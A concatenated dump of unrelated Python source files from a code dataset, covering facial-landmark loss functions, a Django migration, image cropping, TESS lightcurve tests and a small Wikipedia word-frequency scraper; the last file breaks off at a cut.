imgpr.print_image_arr(i + 1, np.zeros(shape=[56, 56]), x_h_t, y_h_t)\n # imgpr.print_image_arr((i + 1)*1000, np.zeros(shape=[56, 56]), x_h_p, y_h_p)\n\n # print('--xy_h_p:---')\n # print(xy_h_p)\n # print('--xy_h_t:---')\n # print(xy_h_t)\n\n face_p, mouth_p, nose_p, leye_p, reye_p = self._depart_facial_point(xy_h_p)\n face_t, mouth_t, nose_t, leye_t, reye_t = self._depart_facial_point(xy_h_t)\n\n '''generate facial distance matrix'''\n face_p_mat, face_t_mat = self._generate_distance_matrix(face_p), self._generate_distance_matrix(face_t)\n mouth_p_mat, mouth_t_mat = self._generate_distance_matrix(mouth_p), self._generate_distance_matrix(mouth_t)\n nose_p_mat, nose_t_mat = self._generate_distance_matrix(nose_p), self._generate_distance_matrix(nose_t)\n leye_p_mat, leye_t_mat = self._generate_distance_matrix(leye_p), self._generate_distance_matrix(leye_t)\n reye_p_mat, reye_t_mat = self._generate_distance_matrix(reye_p), self._generate_distance_matrix(reye_t)\n\n '''calculate loss from each pair matrices'''\n\n face_loss = LearningConfig.reg_term_face * self._calculate_mse(face_p_mat, face_t_mat) / len(face_p)\n mouth_loss = LearningConfig.reg_term_mouth * self._calculate_mse(mouth_p_mat, mouth_t_mat) / len(mouth_p)\n nose_loss = LearningConfig.reg_term_nose * self._calculate_mse(nose_p_mat, nose_t_mat) / len(nose_p)\n leye_loss = LearningConfig.reg_term_leye * self._calculate_mse(leye_p_mat, leye_t_mat) / len(leye_p)\n reye_loss = LearningConfig.reg_term_reye * self._calculate_mse(reye_p_mat, reye_t_mat) / len(reye_p)\n\n loss_array.append(face_loss + mouth_loss + nose_loss + leye_loss + reye_loss)\n\n # print('mse[i]: ' + str(vec_mse[i]))\n # print('face_loss[i]: ' + str(face_loss))\n # print('mouth_loss[i]: ' + str(mouth_loss))\n # print('nose_loss[i]: ' + str(nose_loss))\n # print('leye_loss[i]: ' + str(leye_loss))\n # print('reye_loss[i]: ' + str(reye_loss))\n # print('============')\n\n loss_array = np.array(loss_array)\n tensor_distance_loss = K.variable(loss_array)\n\n # tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, loss_array])\n tensor_total_loss = tf.add(tensor_mean_square_error, tensor_distance_loss)\n return tensor_total_loss\n\n def __inceptionLoss_1(self, yTrue, yPred):\n return self.__soft_MSE(yTrue, yPred, 20)\n\n def __inceptionLoss_2(self, yTrue, yPred):\n return self.__soft_MSE(yTrue, yPred, 10)\n\n def __inceptionLoss_3(self, yTrue, yPred):\n return self.__soft_MSE(yTrue, yPred, 5)\n\n def __soft_MSE(self, yTrue, yPred, boundary_count, radius=0.01):\n yTrue_vector_batch = K.eval(yTrue)\n yPred_vector_batch = K.eval(yPred)\n\n out_batch_vector = [] # 50 *136\n for i in range(LearningConfig.batch_size):\n out_vector = [] # 136\n for j in range(LearningConfig.batch_size):\n if abs(yTrue_vector_batch[i, j] - yPred_vector_batch[i, j]) <= boundary_count * radius:\n out_vector.append(0)\n else:\n out_vector.append(1)\n out_batch_vector.append(out_vector)\n\n out_batch_vector = np.array(out_batch_vector)\n out_batch_tensor = K.variable(out_batch_vector)\n\n tensor_mean_square_error = K.mean(K.square(yPred - yTrue), axis=-1)\n tmp_mul = tf.multiply(tensor_mean_square_error, out_batch_tensor)\n return tmp_mul\n\n def __ASM(self, input_tensor, pca_postfix):\n print(pca_postfix)\n pca_utility = PCAUtility()\n image_utility = ImageUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug, pca_postfix=pca_postfix)\n\n input_vector_batch = K.eval(input_tensor)\n out_asm_vector = []\n for i in range(LearningConfig.batch_size):\n b_vector_p = self.calculate_b_vector(input_vector_batch[i], True, eigenvalues, eigenvectors, meanvector)\n # asm_vector = meanvector + np.dot(eigenvectors, b_vector_p)\n #\n # labels_predict_transformed, landmark_arr_x_p, landmark_arr_y_p = \\\n # image_utility.create_landmarks_from_normalized(asm_vector, 224, 224, 112, 112)\n # imgpr.print_image_arr(i + 1, np.zeros(shape=[224,224,3]), landmark_arr_x_p, landmark_arr_y_p)\n\n out_asm_vector.append(meanvector + np.dot(eigenvectors, b_vector_p))\n\n out_asm_vector = np.array(out_asm_vector)\n\n tensor_out = K.variable(out_asm_vector)\n return tensor_out\n\n def __customLoss(self, yTrue, yPred):\n pca_utility = PCAUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n # yTrue = tf.constant([[1.0, 2.0, 3.0], [5.0, 4.0, 7.0]])\n # yPred = tf.constant([[2.0, 5.0, 6.0], [7.0, 3.0, 8.0]])\n # session = K.get_session()\n bias = 1\n tensor_mean_square_error = K.log((K.mean(K.square(yPred - yTrue), axis=-1) + bias))\n mse = K.eval(tensor_mean_square_error)\n # print(\"mse:\")\n # print(mse)\n # print(\"---->>>\")\n\n yPred_arr = K.eval(yPred)\n yTrue_arr = K.eval(yTrue)\n\n loss_array = []\n\n for i in range(LearningConfig.batch_size):\n asm_loss = 0\n\n truth_vector = yTrue_arr[i]\n predicted_vector = yPred_arr[i]\n\n b_vector_p = self.calculate_b_vector(predicted_vector, True, eigenvalues, eigenvectors, meanvector)\n y_pre_asm = meanvector + np.dot(eigenvectors, b_vector_p)\n\n for j in range(len(y_pre_asm)):\n asm_loss += (truth_vector[j] - y_pre_asm[j]) ** 2\n asm_loss /= len(y_pre_asm)\n\n asm_loss += bias + 1\n asm_loss = math.log(asm_loss, 10)\n asm_loss *= LearningConfig.regularization_term\n loss_array.append(asm_loss)\n print('mse[i]' + str(mse[i]))\n print('asm_loss[i]' + str(asm_loss))\n print('============')\n\n loss_array = np.array(loss_array)\n\n tensor_asm_loss = K.variable(loss_array)\n tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, tensor_asm_loss], axis=0)\n\n return tensor_total_loss\n\n def __customLoss_base(self, yTrue, yPred):\n pca_utility = PCAUtility()\n image_utility = ImageUtility()\n tf_record_utility = TFRecordUtility()\n\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n # yTrue = tf.constant([[1.0, 2.0, 3.0], [5.0, 4.0, 7.0]])\n # yPred = tf.constant([[9.0, 1.0, 2.0], [7.0, 3.0, 8.0]])\n # session = K.get_session()\n\n tensor_mean_square_error = K.mean(K.square(yPred - yTrue), axis=-1)\n # tensor_mean_square_error = keras.losses.mean_squared_error(yPred, yTrue)\n mse = K.eval(tensor_mean_square_error)\n\n yPred_arr = K.eval(yPred)\n yTrue_arr = K.eval(yTrue)\n\n loss_array = []\n\n for i in range(LearningConfig.batch_size):\n asm_loss = 0\n\n truth_vector = yTrue_arr[i]\n predicted_vector = yPred_arr[i]\n\n b_vector_p = self.calculate_b_vector(predicted_vector, True, eigenvalues, eigenvectors, meanvector)\n y_pre_asm = meanvector + np.dot(eigenvectors, b_vector_p)\n\n \"\"\"in order to test the results after PCA, you can use these lines of code\"\"\"\n # landmark_arr_xy, landmark_arr_x, landmark_arr_y = image_utility.create_landmarks_from_normalized(truth_vector, 224, 224, 112, 112)\n # image_utility.print_image_arr(i, np.ones([224, 224]), landmark_arr_x, landmark_arr_y)\n #\n # landmark_arr_xy_new, landmark_arr_x_new, landmark_arr_y_new= image_utility.create_landmarks_from_normalized(y_pre_asm, 224, 224, 112, 112)\n # image_utility.print_image_arr(i*100, np.ones([224, 224]), landmark_arr_x_new, landmark_arr_y_new)\n\n for j in range(len(y_pre_asm)):\n asm_loss += (truth_vector[j] - y_pre_asm[j]) ** 2\n asm_loss /= len(y_pre_asm)\n\n # asm_loss *= mse[i]\n # asm_loss *= LearningConfig.regularization_term\n\n loss_array.append(asm_loss)\n\n print('mse[i]' + str(mse[i]))\n print('asm_loss[i]' + str(asm_loss))\n print('============')\n\n loss_array = np.array(loss_array)\n tensor_asm_loss = K.variable(loss_array)\n\n # sum_loss_tensor = tf.add(tensor_mean_square_error, tensor_asm_loss)\n tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, tensor_asm_loss], axis=0)\n\n # sum_loss = np.array(K.eval(tensor_asm_loss))\n # print(mse)\n # print(K.eval(tensor_mean_square_error))\n # print(K.eval(tensor_asm_loss))\n # print('asm_loss ' + str(loss_array[0]))\n # print('mse_loss ' + str(mse[0]))\n # print('sum_loss ' + str(sum_loss[0]))\n # print('total_loss ' + str(total_loss[0]))\n # print(' ')\n return tensor_total_loss\n\n def custom_teacher_student_loss_cos(self, lnd_img_map, img_path, teacher_models, teachers_weight_loss, bath_size,\n num_points, cos_weight):\n def loss(y_true, y_pred):\n cosine_loss = tf.keras.losses.cosine_similarity(axis=1)\n image_utility = ImageUtility()\n\n t0_model = teacher_models[0]\n l0_weight = teachers_weight_loss[0]\n\n t1_model = teacher_models[1]\n l1_weight = teachers_weight_loss[1]\n\n y_true_n = tf.reshape(y_true, [bath_size, num_points], name=None)\n imgs_address = self.get_y(y_true_n, lnd_img_map, img_path)\n imgs_batch = [np.array(Image.open(img_file)) / 255.0 for img_file in imgs_address]\n\n y_pred_T0 = np.array([t0_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n y_pred_T1 = np.array([t1_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n\n '''test teacher Nets'''\n # counter = 0\n # for pre_points in y_pred_T1:\n # labels_predict_transformed, landmark_arr_x_p, landmark_arr_y_p = \\\n # image_utility.create_landmarks_from_normalized(pre_points, 224, 224, 112, 112)\n # imgpr.print_image_arr((counter + 1) * 1000, imgs_batch[counter], landmark_arr_x_p, landmark_arr_y_p)\n # counter += 1\n\n y_pred_T0_ten = K.variable(y_pred_T0)\n y_pred_T1_ten = K.variable(y_pred_T1)\n\n mse_te0 = K.mean(K.square(y_pred_T0_ten - y_true))\n mse_te0_cos = cosine_loss(y_pred_T0_ten, y_true)\n\n mse_te1 = K.mean(K.square(y_pred_T1_ten - y_true))\n mse_te1_cos = cosine_loss(y_pred_T1_ten, y_true)\n\n mse_main = K.mean(K.square(y_pred - y_true))\n mse_main_cos = cosine_loss(y_pred, y_true)\n\n return (mse_main + cos_weight * mse_main_cos) \\\n + l0_weight * (mse_te0 + cos_weight * mse_te0_cos) \\\n + l1_weight * (mse_te1 + cos_weight * mse_te1_cos)\n\n return loss\n\n def init_tensors(self, test):\n batchsize = LearningConfig.batch_size\n if test:\n batchsize = 1\n\n pca_utility = PCAUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug, )\n\n # print(\"predicted_tensor \" + str(predicted_tensor.shape))\n # print(\"meanvector \" + str(meanvector.shape))\n # print(\"eigenvalues \" + str(eigenvalues.shape))\n # print(\"eigenvectors \" + str(eigenvectors.shape))\n # print(\"-\")\n\n self._meanvector_arr = np.tile(meanvector, (batchsize, 1))\n # meanvector_arr = np.tile(meanvector[None, :, None], (LearningConfig.batch_size, 1, 1))\n # print(\"meanvector_arr\" + str(meanvector_arr.shape))\n\n self._eigenvalues_arr = np.tile(eigenvalues, (batchsize, 1))\n # eigenvalues_arr = np.tile(eigenvalues[None, :, None], (LearningConfig.batch_size, 1, 1))\n # print(\"eigenvalues_arr\" + str(eigenvalues_arr.shape))\n\n self._eigenvectors_arr = np.tile(eigenvectors[None, :, :], (batchsize, 1, 1))\n # print(\"eigenvectors_arr\" + str(eigenvectors_arr.shape))\n\n self._meanvector_tensor = tf.convert_to_tensor(self._meanvector_arr, dtype=tf.float32)\n self._eigenvalues_tensor = tf.convert_to_tensor(self._eigenvalues_arr, dtype=tf.float32)\n self._eigenvectors_tensor = tf.convert_to_tensor(self._eigenvectors_arr, dtype=tf.float32)\n\n self._eigenvectors_T = tf.transpose(self._eigenvectors_tensor, perm=[0, 2, 1])\n print(\"\")\n\n def custom_activation(self, predicted_tensor):\n pca_utility = PCAUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n b_vector_tensor = self.calculate_b_vector_tensor(predicted_tensor, True, eigenvalues,\n self._eigenvectors_tensor, self._meanvector_tensor)\n\n out = tf.add(tf.expand_dims(self._meanvector_tensor, 2), tf.matmul(self._eigenvectors_tensor, b_vector_tensor))\n out = tf.reshape(out, [LearningConfig.batch_size, 136])\n\n return out\n\n def calculate_b_vector_tensor(self, predicted_tensor, correction, eigenvalues, eigenvectors, mean_tensor):\n tmp1 = tf.expand_dims(tf.subtract(predicted_tensor, mean_tensor), 2)\n\n b_vector_tensor = tf.matmul(self._eigenvectors_T, tmp1) # (50, 50, 1)\n\n return b_vector_tensor\n\n b_vector = np.squeeze(K.eval(b_vector_tensor), axis=2)[0]\n print(\"b_vector -> \" + str(b_vector.shape)) # (50,)\n\n mul_arr = np.ones(b_vector.shape)\n add_arr = np.zeros(b_vector.shape)\n\n # put b in -3lambda =>\n if correction:\n i = 0\n for b_item in b_vector:\n lambda_i_sqr = 3 * math.sqrt(eigenvalues[i])\n\n if b_item > 0:\n if b_item > lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = min(b_item, lambda_i_sqr)\n else:\n if b_item < -1 * lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = max(b_item, -1 * lambda_i_sqr)\n\n b_vector[i] = b_item\n i += 1\n\n mul_arr = np.tile(mul_arr, (LearningConfig.batch_size, 1))\n add_arr = np.tile(add_arr, (LearningConfig.batch_size, 1))\n\n # print(mul_arr)\n # print(add_arr)\n\n mul_tensor = tf.expand_dims(tf.convert_to_tensor(mul_arr, dtype=tf.float32), 2)\n add_arr = tf.expand_dims(tf.convert_to_tensor(add_arr, dtype=tf.float32), 2)\n\n # print(\"mul_tensor -> \" + str(mul_tensor.shape)) # (50, 50, 1)\n # print(\"add_arr -> \" + str(add_arr.shape)) # (50, 50, 1)\n\n tmp_mul = tf.multiply(b_vector_tensor, mul_tensor)\n tmp_add = tf.add(tmp_mul, add_arr)\n\n # print(\"add_arr -> \" + str(add_arr.shape)) # (50, 50, 1)\n\n return tmp_add\n\n def custom_activation_test(self, predicted_tensor):\n pca_utility = PCAUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n b_vector_tensor = self.calculate_b_vector_tensor_test(predicted_tensor, True, eigenvalues,\n self._eigenvectors_tensor, self._meanvector_tensor)\n\n out = tf.add(tf.expand_dims(self._meanvector_tensor, 2), tf.matmul(self._eigenvectors_tensor, b_vector_tensor))\n out = tf.reshape(out, [1, 136])\n\n return out\n\n def calculate_b_vector_tensor_test(self, predicted_tensor, correction, eigenvalues, eigenvectors, mean_tensor):\n\n # print(\"predicted_tensor -> \" + str(predicted_tensor.shape)) # (50,)\n # print(\"eigenvalues -> \" + str(eigenvalues.shape)) # (50,)\n # print(\"eigenvectors -> \" + str(eigenvectors.shape)) # (50,)\n # print(\"mean_tensor -> \" + str(mean_tensor.shape)) # (50,)\n\n tmp1 = tf.expand_dims(tf.subtract(predicted_tensor, mean_tensor), 2)\n # print(\"tmp1 -> \" + str(tmp1.shape)) # (50,)\n\n b_vector_tensor = tf.matmul(self._eigenvectors_T, tmp1) # (50, 50, 1)\n print(\"b_vector_tensor -> \" + str(b_vector_tensor.shape)) # (50,)\n return b_vector_tensor\n\n # inputs = K.placeholder(shape=(None, 224, 224, 3))\n #\n # sess = K.get_session()\n # tmp22 = sess.run(inputs)\n # tmp22 = K.get_value(b_vector_tensor)\n\n tmp22 = K.eval(b_vector_tensor)\n\n # holder = tf.placeholder(tf.float32, shape=(None, 224,224,3))\n # with tf.Session() as sess:\n # sess.run(tf.global_variables_initializer())\n # print(\"12\")\n # tmp22 = sess.run([b_vector_tensor], feed_dict=holder)\n # b_vector_tensor.eval(feed_dict=holder)\n\n print(\"tmp22 -> \" + str(tmp22.shape))\n b_vector = np.squeeze(K.eval(b_vector_tensor), axis=2)\n print(\"b_vector -> \" + str(b_vector.shape)) # (50,)\n\n mul_arr = np.ones(b_vector.shape)\n add_arr = np.zeros(b_vector.shape)\n\n # put b in -3lambda =>\n if correction:\n i = 0\n for b_item in b_vector:\n lambda_i_sqr = 3 * math.sqrt(eigenvalues[i])\n\n if b_item > 0:\n if b_item > lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = min(b_item, lambda_i_sqr)\n else:\n if b_item < -1 * lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = max(b_item, -1 * lambda_i_sqr)\n\n b_vector[i] = b_item\n i += 1\n\n mul_arr = np.tile(mul_arr, (1, 1))\n add_arr = np.tile(add_arr, (1, 1))\n\n # print(mul_arr)\n # print(add_arr)\n\n mul_tensor = tf.expand_dims(tf.convert_to_tensor(mul_arr, dtype=tf.float32), 2)\n add_arr = tf.expand_dims(tf.convert_to_tensor(add_arr, dtype=tf.float32), 2)\n\n # print(\"mul_tensor -> \" + str(mul_tensor.shape)) # (50, 50, 1)\n # print(\"add_arr -> \" + str(add_arr.shape)) # (50, 50, 1)\n\n tmp_mul = tf.multiply(b_vector_tensor, mul_tensor)\n tmp_add = tf.add(tmp_mul, add_arr)\n\n print(\"tmp_add -> \" + str(tmp_add.shape)) # (50, 50, 1)\n\n return tmp_add\n\n def calculate_b_vector(self, predicted_vector, correction, eigenvalues, eigenvectors, meanvector):\n tmp1 = predicted_vector - meanvector\n b_vector = np.dot(eigenvectors.T, tmp1)\n\n # put b in -3lambda =>\n if correction:\n i = 0\n for b_item in b_vector:\n lambda_i_sqr = 3 * math.sqrt(eigenvalues[i])\n\n if b_item > 0:\n b_item = min(b_item, lambda_i_sqr)\n else:\n b_item = max(b_item, -1 * lambda_i_sqr)\n b_vector[i] = b_item\n i += 1\n\n return b_vector\n\n def __reorder(self, input_arr):\n out_arr = []\n for i in range(68):\n out_arr.append(input_arr[i])\n k = 68 + i\n out_arr.append(input_arr[k])\n return np.array(out_arr)\n\n def test_pca_validity(self, pca_postfix):\n cnn_model = CNNModel()\n pca_utility = PCAUtility()\n tf_record_utility = TFRecordUtility()\n image_utility = ImageUtility()\n\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(dataset_name=DatasetName.ibug,\n pca_postfix=pca_postfix)\n\n lbl_arr, img_arr, pose_arr = tf_record_utility.retrieve_tf_record(tfrecord_filename=IbugConf.tf_train_path,\n number_of_records=30, only_label=False)\n for i in range(20):\n b_vector_p = self.calculate_b_vector(lbl_arr[i], True, eigenvalues, eigenvectors, meanvector)\n lbl_new = meanvector + np.dot(eigenvectors, b_vector_p)\n\n labels_true_transformed, landmark_arr_x_t, landmark_arr_y_t = image_utility. \\\n create_landmarks_from_normalized(lbl_arr[i], 224, 224, 112, 112)\n\n labels_true_transformed_pca, landmark_arr_x_pca, landmark_arr_y_pca = image_utility. \\\n create_landmarks_from_normalized(lbl_new, 224, 224, 112, 112)\n\n image_utility.print_image_arr(i, img_arr[i], landmark_arr_x_t, landmark_arr_y_t)\n image_utility.print_image_arr(i * 1000, img_arr[i], landmark_arr_x_pca, landmark_arr_y_pca)\n\n _meanvector_arr = []\n _eigenvalues_arr = []\n _eigenvectors_arr = []\n _meanvector_tensor = None\n _eigenvalues_tensor = None\n _eigenvectors_tensor = None\n _eigenvectors_T = None\n","sub_path":"custom_Losses.py","file_name":"custom_Losses.py","file_ext":"py","file_size_in_byte":39624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260023368","text":"import functions.arithmetic_functions as afun\nimport functions.polynomial_functions as pfun\nimport functions.exponential_functions as efun\n\nx = 2.0\ny = 5.0\n\n# Test arithmetic functions\nu = afun.addition(x,y)\nprint(u)\n\n# Test polynomial functions\nv = pfun.poly(y,2)\nprint(v)\n\n# Test exponential functions\nw = efun.exponential(x)\nprint(w)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442043045","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bulto',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),\n ('ancho', models.IntegerField()),\n ('largo', models.IntegerField()),\n ('alto', models.IntegerField()),\n ('punto', models.IntegerField()),\n ],\n options={\n 'verbose_name': 'Bulto',\n 'verbose_name_plural': 'Bultos',\n },\n ),\n ]\n","sub_path":"bulto/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207168950","text":"import numpy as np\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom ctypes import *\nimport platform\nimport isp_config\nfrom skimage import data, color\nfrom skimage.transform import rescale, resize, downscale_local_mean\n\nclass Crop(object):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def run(self, bgr):\n x = self.cfg.outCropLeft\n y = self.cfg.outCropTop\n w = self.cfg.outCropWidth\n h = self.cfg.outCropHeight\n if (x < 0) or (w > bgr.shape[1]):\n x = 0\n if (y < 0) or (h > bgr.shape[0]):\n y = 0\n if (w < 0) or (w > bgr.shape[1]):\n w = bgr.shape[1]\n if (h < 0) or (h > bgr.shape[0]):\n h = bgr.shape[0]\n return bgr[y:y+h, x:x+w, 0:3]\n\nclass Scaler(object):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def run(self, bgr):\n w = self.cfg.outScalerWidth\n h = self.cfg.outScalerHeight\n if (w == -1):\n w = bgr.shape[1]\n if (h == -1):\n h = bgr.shape[0]\n if (w != bgr.shape[1]) or (h != bgr.shape[0]):\n raise NotImplementedError('not implemented yet')\n\n return bgr\n \n","sub_path":"isp_output.py","file_name":"isp_output.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"257161320","text":"import datetime\nfrom core.utils.serialize import (\n Serializer,\n Field,\n IntField,\n DateField,\n FileField\n)\nfrom .models import Affectation\n\n\nclass TypeMaterielSerializer(Serializer):\n id = IntField()\n label = Field()\n observations = Field()\n\n\nclass AffectationSerializer(Serializer):\n id = IntField()\n id_materiel = IntField()\n type_affectation = IntField()\n utilisateur = Field()\n date_affectation = DateField(default=datetime.datetime.now())\n date_retour = DateField()\n observations = Field()\n\n\nclass MaterielSerializer(Serializer):\n id = IntField()\n type_mat = IntField(preparefn=lambda x: x['id'])\n label = Field()\n reference = Field()\n disponible = IntField()\n utilisateur_actuel = Field()\n\n\nclass MaterielFullSerializer(MaterielSerializer):\n observations = Field()\n date_entree = DateField(default=datetime.datetime.now())\n date_exclusion = DateField()\n etat = Field()\n '''\n affectations = Field(\n preparefn=lambda x: [AffectationSerializer(Affectation).load(o) for o in x],\n serializefn=lambda x: [AffectationSerializer(o).dump() for o in x] if x else []\n )\n '''\n","sub_path":"modules/materiel/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"103452092","text":"\n\nfrom xai.brain.wordbase.verbs._badger import _BADGER\n\n#calss header\nclass _BADGERS(_BADGER, ):\n\tdef __init__(self,): \n\t\t_BADGER.__init__(self)\n\t\tself.name = \"BADGERS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"badger\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_badgers.py","file_name":"_badgers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621635136","text":"\"\"\"Tests for the FfiToiDatabase class.\"\"\"\nfrom pathlib import Path\nfrom typing import Tuple\nfrom unittest.mock import patch, Mock\nimport numpy as np\nimport pytest\n\nimport ramjet.photometric_database.ffi_toi_database\nfrom ramjet.photometric_database.ffi_toi_database import FfiToiDatabase\n\n\nclass TestFfiToiDatabase:\n \"\"\"Tests for the FfiToiDatabase class.\"\"\"\n\n @pytest.fixture\n def database(self) -> FfiToiDatabase:\n \"\"\"\n Sets up the database for use in a test.\n\n :return: The database.\n \"\"\"\n return FfiToiDatabase()\n\n @pytest.fixture\n def ffi_pickle_contents(self) -> Tuple[int, float, float, float,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"\n Creates a mock contents of one of Brian's FFI data files.\n\n :return: TIC ID, right ascension, declination, TESS magnitude,\n time, raw flux, corrected flux, PCA flux, flux error.\n \"\"\"\n tic_id = 231663901\n ra = 62.2\n dec = -71.4\n tess_magnitude = 10\n time = np.arange(0, 100, 10)\n raw_flux = np.arange(10)\n corrected_flux = np.arange(10, 20)\n pca_flux = np.arange(20, 30)\n flux_error = np.arange(0, 1, 0.1)\n return tic_id, ra, dec, tess_magnitude, time, raw_flux, corrected_flux, pca_flux, flux_error\n\n def test_can_create_synthetic_signal_from_real_data(self, database):\n fluxes = np.array([100, 100, 90, 110, 100, 100])\n times = np.array([100, 110, 120, 130, 140, 150])\n synthetic_magnifications, synthetic_times = database.generate_synthetic_signal_from_real_data(fluxes, times)\n assert np.array_equal(synthetic_magnifications, [1, 1, 0.9, 1.1, 1, 1])\n assert np.array_equal(synthetic_times, [0, 10, 20, 30, 40, 50])\n\n @patch.object(ramjet.photometric_database.ffi_toi_database.TessFfiDataInterface,\n 'load_fluxes_and_times_from_pickle_file')\n def test_lightcurve_loading_loads_ffi_data_from_pickle(self, mock_load_fluxes_and_times_from_pickle_file, database,\n ffi_pickle_contents):\n file_fluxes = ffi_pickle_contents[6]\n file_times = ffi_pickle_contents[4]\n file_lightcurve = file_fluxes, file_times\n mock_load_fluxes_and_times_from_pickle_file.return_value = file_lightcurve\n fake_file_path = 'fake_path.pkl'\n fluxes, times = database.load_fluxes_and_times_from_lightcurve_path(fake_file_path)\n assert np.array_equal(fluxes, ffi_pickle_contents[6])\n assert np.array_equal(times, ffi_pickle_contents[4])\n\n def test_synthetic_signal_loading_loads_real_toi_lightcurve_as_synthetic(self, database):\n file_fluxes = np.array([100, 100, 90, 110, 100, 100])\n file_times = np.array([100, 110, 120, 130, 140, 150])\n file_lightcurve = file_fluxes, file_times\n database.tess_data_interface.load_fluxes_and_times_from_fits_file = Mock(return_value=file_lightcurve)\n fake_file_path = 'fake_path.fits'\n magnifications, times = database.load_magnifications_and_times_from_synthetic_signal_path(fake_file_path)\n assert np.array_equal(magnifications, [1, 1, 0.9, 1.1, 1, 1])\n assert np.array_equal(times, [0, 10, 20, 30, 40, 50])\n\n def test_injecting_out_of_bounds_is_enabled_by_default(self, database):\n lightcurve_fluxes = np.array([1, 2, 3, 4, 5, 3])\n lightcurve_times = np.array([10, 20, 30, 40, 50, 60])\n signal_magnifications = np.array([1, 3, 1])\n signal_times = np.array([0, 20, 40])\n fluxes_with_injected_signal = database.inject_signal_into_lightcurve(lightcurve_fluxes, lightcurve_times,\n signal_magnifications, signal_times)\n assert np.array_equal(fluxes_with_injected_signal, np.array([1, 5, 9, 7, 5, 3]))","sub_path":"tests/photometric_database/test_ffi_toi_database.py","file_name":"test_ffi_toi_database.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536021138","text":"import requests as rq\nfrom itertools import groupby\nfrom bs4 import BeautifulSoup as BS\nimport re\n\ndef cretae_question(question,type):\n try:\n string = input(question.strip()+\" или введите exit чтобы прервать выполнение скрипта: \")\n if string==\"exit\":\n sys.exit()\n else:\n return type(string)\n except TypeError as e:\n print(\"Ошибка: не корректно введено значение\")\n return cretae_question(question,type)\n\ndef get_link(topic):\n link = \"https://ru.wikipedia.org/wiki/\" + topic.capitalize()\n return link\n\ndef get_content(link):\n return rq.get(link).text\n\ndef visualize_common_words(content,start=100,end=90):\n try:\n start = int(start)\n end = int(end)\n except TypeError as e:\n rint(\"Ошибка: не корректно указан диапазон\")\n words_list = re.findall(\"[а-яА-Я\\-\\']{4,}\", content)\n words_list.sort()\n words = [ tuple([key,len(list(group))]) for key, group in groupby(words_list)]\n words.sort(key=lambda t: t[1],reverse = True)\n for w in words[start if startstart else start]:\n print(w[0])\n\n\ndef get_wiki_sub_links(s):\n bs = BS(s,\"html.parser\")\n div = bs.find(id=\"mw-content-text\")\n\n # ссылки ищутся только в основной части иначе каша получается\n #зачем все возмем только 5\n return [i[\"href\"] for i in div.findChildren(href=re.compile(\"/wiki/%.*\")) if not i.get(\"class\",[])][:5]\n\ndef get_topic(link,pattern):\n return pattern.findall(link)[0]\n\n\n\nlist = [];\n\npattern = re.compile(\"/wiki/(%.*)\")\nfor l in get_wiki_sub_links(get_content(get_link(cretae_question(\"введите искомую информацию\",str)))):\n list.append(l)\n [list.append(i) for i in get_wiki_sub_links(get_content(get_link(get_topic(l,pattern))))]\n\nprint(\"\")\nprint(\"_\"*100)\nprint(\"не понял задания из чего в конце концов должен состоять результирующий список поэтому состоит из 5 ссылок искомой страницы и пяти ссылок из каждой из страниц на которую они ведут \")\nprint(\"\")\nprint(\"\\n\".join(list))\n","sub_path":"python/middle/hw_4.py","file_name":"hw_4.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58291719","text":"\"\"\"\n\"\"\"\nimport json\nimport re\nimport logging\nfrom flask import Flask, request, Response\nimport time\nimport importlib\nimport os\n\n#pkg_it = 